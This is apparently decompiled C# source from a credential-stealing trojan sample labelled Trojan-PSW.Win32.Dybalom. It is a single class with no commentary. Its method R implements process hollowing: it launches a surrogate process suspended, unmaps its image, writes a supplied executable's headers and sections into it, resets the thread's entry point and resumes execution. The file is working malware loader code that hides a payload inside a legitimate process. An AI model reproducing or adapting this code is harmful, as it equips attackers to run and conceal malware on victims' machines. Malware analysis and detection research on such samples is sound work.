// Decompiled with JetBrains decompiler // Type: IX // Assembly: 46-dcrio, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: C9E84790-40DE-4FD0-B1D8-6D752394B661 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe using System; using System.Runtime.InteropServices; using System.Text; public class IX { [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool CreateProcess( string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo); [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt); [DllImport("kernel32")] private static extern bool SetThreadContext(IntPtr t, uint[] c); [DllImport("ntdll")] private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr); [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool ReadProcessMemory( IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead); [DllImport("kernel32.dll")] private static extern uint ResumeThread(IntPtr hThread); [DllImport("kernel32")] private static extern IntPtr VirtualAllocEx( IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] private static extern bool VirtualProtectEx( IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect); [DllImport("kernel32.dll", SetLastError = true)] private static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); public static bool R(byte[] bytes, string surrogateProcess) { try { IntPtr zero1 = IntPtr.Zero; IntPtr[] pInfo = new IntPtr[4]; byte[] sInfo = new byte[68]; int int32 = BitConverter.ToInt32(bytes, 60); int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6); IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84)); if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo)) { uint[] numArray1 = new uint[179]; numArray1[0] = 65538U; if (IX.GetThreadContext(pInfo[1], numArray1)) { IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L); IntPtr zero2 = IntPtr.Zero; IntPtr bufrSize = new IntPtr(4); IntPtr zero3 = IntPtr.Zero; if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U) { IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52)); IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80)); IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64); int lpNumberOfBytesWritten; IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten); int num3 = int16 - 1; for (int index = 0; index <= num3; ++index) { int[] dst = new int[10]; Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40); byte[] numArray2 = new byte[dst[4] - 1 + 1]; Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length); num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]); num1 = new IntPtr(numArray2.Length); IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten); } num2 = new IntPtr((long) numArray1[41] + 8L); num1 = new IntPtr(4); IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten); numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)); IX.SetThreadContext(pInfo[1], numArray1); } } int num = (int) IX.ResumeThread(pInfo[1]); } } catch { return false; } return true; } }